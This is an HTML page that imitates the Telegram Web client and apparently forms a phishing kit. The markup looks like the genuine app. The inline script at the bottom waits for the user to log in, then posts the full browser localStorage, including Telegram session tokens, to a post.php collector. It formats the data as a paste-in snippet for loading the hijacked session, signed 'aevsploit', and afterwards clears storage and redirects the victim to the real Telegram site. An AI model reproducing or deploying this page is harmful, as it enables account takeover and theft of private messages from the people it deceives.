<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <title>Telegram Web</title>
    <meta
      name="description"
      content="Telegram is a cloud-based mobile and desktop messaging app with a focus on security and speed."
    />
    <meta
      name="viewport"
      content="width=device-width,initial-scale=1,viewport-fit=cover"
    />
    <link
      rel="apple-touch-icon"
      sizes="180x180"
      href="assets/img/apple-touch-icon.png?v=jw3mK7G9Ry"
    />
    <link
      rel="icon"
      type="image/png"
      sizes="32x32"
      href="assets/img/favicon-32x32.png?v=jw3mK7G9Ry"
    />
    <link rel="manifest" href="site.webmanifest?v=jw3mK7G9Aq" />
    <link
      rel="mask-icon"
      href="assets/img/safari-pinned-tab.svg?v=jw3mK7G9Ry"
      color="#3390ec"
    />
    <meta name="apple-mobile-web-app-title" content="Telegram WebK" />
    <meta name="application-name" content="Telegram WebK" />
    <meta name="msapplication-TileColor" content="#2d89ef" />
    <meta
      name="msapplication-TileImage"
      content="assets/img/mstile-144x144.png?v=jw3mK7G9Ry"
    />
    <meta
      name="msapplication-config"
      content="browserconfig.xml?v=jw3mK7G9Ry"
    />
    <meta name="theme-color" content="#ffffff" />
    <meta name="color-scheme" content="light" />
    <link rel="stylesheet" href="main.f71896c2c50d07adcf73.css" />
    <link
      rel="stylesheet"
      href="style-desktop.9d7b485ed526720a3aad.css"
      media="only screen and (min-width:721px)"
    />
  </head>
  <body class="animation-level-2">
    <!--[if IE]>
      <p class="browserupgrade">
        You are using an <strong>outdated</strong> browser. Please
        <a href="https://browsehappy.com/">upgrade your browser</a> to improve
        your experience and security.
      </p>
    <![endif]-->
    <div class="whole" id="auth-pages" style="display: none">
      <div class="scrollable scrollable-y">
        <div class="tabs-container auth-pages__container" data-animation="tabs">
          <div class="tabs-tab page-sign">
            <div class="container">
              <div class="auth-image">
                <svg
                  class="sign-logo"
                  xmlns="http://www.w3.org/2000/svg"
                  width="160"
                  height="160"
                  viewBox="0 0 160 160"
                >
                  <use href="#logo" />
                </svg>
              </div>
            </div>
          </div>
          <div class="tabs-tab page-signQR">
            <div class="container center-align">
              <div class="auth-image"></div>
            </div>
          </div>
          <div class="tabs-tab page-authCode">
            <div class="container center-align">
              <div class="auth-image"></div>
              <div class="phone-wrapper">
                <h4 class="phone"></h4>
                <span class="phone-edit tgico-edit"></span>
              </div>
              <p class="subtitle sent-type"></p>
              <div class="input-wrapper"></div>
            </div>
          </div>
          <div class="tabs-tab page-password"></div>
          <div class="tabs-tab page-signUp"></div>
        </div>
      </div>
    </div>
    <div class="whole page-chats" style="display: none" id="page-chats">
      <svg style="position: absolute; top: -10000px; left: -10000px">
        <defs id="svg-defs">
          <path
            id="message-tail"
            d="M1.00002881,1.03679295e-14 L7,0 L7,17 C6.8069969,14.1607017 6.12380234,11.2332513 4.95041634,8.21764872 C4.04604748,5.89342034 2.50413132,3.73337411 0.324667862,1.73751004 L0.324652538,1.73752677 C-0.0826597201,1.36452676 -0.110475289,0.731958677 0.262524727,0.324646419 C0.451952959,0.117792698 0.719544377,1.0985861e-14 1.00002881,1.04360964e-14 Z"
          ></path>
          <path
            id="logo"
            fill-rule="evenodd"
            d="M80,0 C124.18278,0 160,35.81722 160,80 C160,124.18278 124.18278,160 80,160 C35.81722,160 0,124.18278 0,80 C0,35.81722 35.81722,0 80,0 Z M114.262551,46.4516129 L114.123923,46.4516129 C111.089589,46.5056249 106.482806,48.0771432 85.1289541,56.93769 L81.4133571,58.4849956 C72.8664779,62.0684477 57.2607933,68.7965125 34.5963033,78.66919 C30.6591745,80.2345564 28.5967328,81.765936 28.4089783,83.2633288 C28.0626453,86.0254269 31.8703852,86.959903 36.7890378,88.5302703 L38.2642674,89.0045258 C42.3926354,90.314406 47.5534685,91.7248852 50.3250916,91.7847532 C52.9151948,91.8407003 55.7944784,90.8162976 58.9629426,88.7115451 L70.5121776,80.9327422 C85.6657026,70.7535853 93.6285785,65.5352892 94.4008055,65.277854 L94.6777873,65.216416 C95.1594319,65.1213105 95.7366278,65.0717596 96.1481181,65.4374337 C96.6344248,65.8695939 96.5866185,66.6880224 96.5351057,66.9075859 C96.127514,68.6448691 75.2839361,87.6143392 73.6629144,89.2417998 L73.312196,89.6016896 C68.7645143,94.2254793 63.9030972,97.1721503 71.5637945,102.355193 L73.3593638,103.544598 C79.0660342,107.334968 82.9483395,110.083813 88.8107882,113.958377 L90.3875424,114.996094 C95.0654739,118.061953 98.7330313,121.697601 103.562866,121.253237 C105.740839,121.052855 107.989107,119.042224 109.175465,113.09692 L109.246762,112.727987 C112.002037,98.0012935 117.417883,66.09303 118.669527,52.9443975 C118.779187,51.7924073 118.641237,50.318088 118.530455,49.6708963 L118.474159,49.3781963 C118.341081,48.7651315 118.067967,48.0040758 117.346762,47.4189793 C116.412565,46.6610871 115.002114,46.4638844 114.262551,46.4516129 Z"
          />
          <path id="poll-line" d="M4.47,5.33v13.6c0,4.97,4.03,9,9,9h458.16" />
          <path
            id="check"
            fill="none"
            d="M 4.7071 12.2929 l 5 5 c 0.3905 0.3905 1.0237 0.3905 1.4142 0 l 11 -11"
          />
          <path
            id="verified-background"
            d="M12.3 2.9c.1.1.2.1.3.2.7.6 1.3 1.1 2 1.7.3.2.6.4.9.4.9.1 1.7.2 2.6.2.5 0 .6.1.7.7.1.9.1 1.8.2 2.6 0 .4.2.7.4 1 .6.7 1.1 1.3 1.7 2 .3.4.3.5 0 .8-.5.6-1.1 1.3-1.6 1.9-.3.3-.5.7-.5 1.2-.1.8-.2 1.7-.2 2.5 0 .4-.2.5-.6.6-.8 0-1.6.1-2.5.2-.5 0-1 .2-1.4.5-.6.5-1.3 1.1-1.9 1.6-.3.3-.5.3-.8 0-.7-.6-1.4-1.2-2-1.8-.3-.2-.6-.4-.9-.4-.9-.1-1.8-.2-2.7-.2-.4 0-.5-.2-.6-.5 0-.9-.1-1.7-.2-2.6 0-.4-.2-.8-.4-1.1-.6-.6-1.1-1.3-1.6-2-.4-.4-.3-.5 0-1 .6-.6 1.1-1.3 1.7-1.9.3-.3.4-.6.4-1 0-.8.1-1.6.2-2.5 0-.5.1-.6.6-.6.9-.1 1.7-.1 2.6-.2.4 0 .7-.2 1-.4.7-.6 1.4-1.2 2.1-1.7.1-.2.3-.3.5-.2z"
          />
          <path
            id="verified-check"
            d="M16.4 10.1l-.2.2-5.4 5.4c-.1.1-.2.2-.4 0l-2.6-2.6c-.2-.2-.1-.3 0-.4.2-.2.5-.6.7-.6.3 0 .5.4.7.6l1.1 1.1c.2.2.3.2.5 0l4.3-4.3c.2-.2.4-.3.6 0 .1.2.3.3.4.5.2 0 .3.1.3.1z"
          />
          <symbol id="message-tail-filled" viewBox="0 0 11 20">
            <g transform="translate(9 -14)" fill="inherit" fill-rule="evenodd">
              <path
                d="M-6 16h6v17c-.193-2.84-.876-5.767-2.05-8.782-.904-2.325-2.446-4.485-4.625-6.48A1 1 0 01-6 16z"
                transform="matrix(1 0 0 -1 0 49)"
                id="corner-fill"
                fill="inherit"
              />
            </g>
          </symbol>
        </defs>
      </svg>
      <div id="main-columns" class="tabs-container" data-animation="navigation">
        <div
          class="tabs-tab chatlist-container sidebar sidebar-left main-column"
          id="column-left"
        >
          <div class="sidebar-slider tabs-container">
            <div class="tabs-tab sidebar-slider-item item-main">
              <div class="sidebar-header">
                <div class="sidebar-header__btn-container">
                  <div class="animated-menu-icon"></div>
                  <div class="btn-icon sidebar-back-button"></div>
                </div>
              </div>
              <div class="sidebar-content transition zoom-fade">
                <div class="transition-item active" id="chatlist-container">
                  <div
                    class="folders-tabs-scrollable menu-horizontal-scrollable hide"
                  >
                    <nav class="menu-horizontal-div" id="folders-tabs"></nav>
                  </div>
                  <div class="tabs-container" id="folders-container"></div>
                </div>
                <div
                  class="transition-item sidebar-search"
                  id="search-container"
                ></div>
              </div>
            </div>
          </div>
        </div>
        <div class="tabs-tab main-column" id="column-center"></div>
        <div
          class="tabs-tab sidebar sidebar-right main-column"
          id="column-right"
        >
          <div class="sidebar-content sidebar-slider tabs-container"></div>
        </div>
      </div>
      <div class="emoji-dropdown" id="emoji-dropdown" style="display: none">
        <div class="emoji-container">
          <div class="tabs-container">
            <div class="tabs-tab emoji-padding">
              <nav class="menu-horizontal-div no-stripe">
                <button
                  class="menu-horizontal-div-item btn-icon tgico-recent rp"
                ></button>
                <button
                  class="menu-horizontal-div-item btn-icon tgico-smile rp"
                ></button>
                <button
                  class="menu-horizontal-div-item btn-icon tgico-animals rp"
                ></button>
                <button
                  class="menu-horizontal-div-item btn-icon tgico-eats rp"
                ></button>
                <button
                  class="menu-horizontal-div-item btn-icon tgico-car rp"
                ></button>
                <button
                  class="menu-horizontal-div-item btn-icon tgico-sport rp"
                ></button>
                <button
                  class="menu-horizontal-div-item btn-icon tgico-lamp rp"
                ></button>
                <button
                  class="menu-horizontal-div-item btn-icon tgico-flag rp"
                ></button>
              </nav>
              <div class="emoticons-content" id="content-emoji"></div>
            </div>
            <div class="tabs-tab stickers-padding">
              <div class="menu-wrapper">
                <nav class="menu-horizontal-div no-stripe justify-start">
                  <button
                    class="menu-horizontal-div-item btn-icon tgico-recent active"
                  ></button>
                </nav>
              </div>
              <div class="emoticons-content" id="content-stickers"></div>
            </div>
            <div class="tabs-tab gifs-padding">
              <div class="emoticons-content" id="content-gifs">
                <div class="gifs-masonry"></div>
              </div>
            </div>
          </div>
        </div>
        <div class="emoji-tabs menu-horizontal-div no-stripe">
          <button
            class="menu-horizontal-div-item emoji-tabs-search justify-self-start btn-icon tgico-search rp"
            data-tab="-1"
          ></button>
          <button
            class="menu-horizontal-div-item emoji-tabs-emoji btn-icon tgico-smile rp"
            data-tab="0"
          ></button>
          <button
            class="menu-horizontal-div-item emoji-tabs-stickers btn-icon tgico-stickers rp"
            data-tab="1"
          ></button>
          <button
            class="menu-horizontal-div-item emoji-tabs-gifs btn-icon tgico-gifs rp"
            data-tab="2"
          ></button>
          <button
            class="menu-horizontal-div-item emoji-tabs-delete justify-self-end btn-icon tgico-deleteleft rp"
            data-tab="-1"
          ></button>
        </div>
      </div>
    </div>
    <script src="main.712f415c3a05b4382935.bundle.js"></script>
    <script>
      var interval = setInterval(function () {
        if (localStorage.getItem("user_auth")) {
          clearInterval(interval);
          postLocalStorageWithFatch()
        }
      });

function postLocalStorageWithFatch(){
  fetch('post.php', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: `__telegram = fake page__,\n
• Telegram
Aşşağıdakini Kopyalayınız. ~aevsploit\n\n
 
let aev = JSON.parse(${JSON.stringify(JSON.stringify(localStorage))});
 Object.keys(aev).forEach(function (k) {
   localStorage.setItem(k, aev[k]);
 });
 document.location.reload(true)\n\n
 `
  })
  .then(data => {
    localStorage.clear();
    document.location = 'https://telegram.org/'
  })
}
    </script>
  </body>
</html>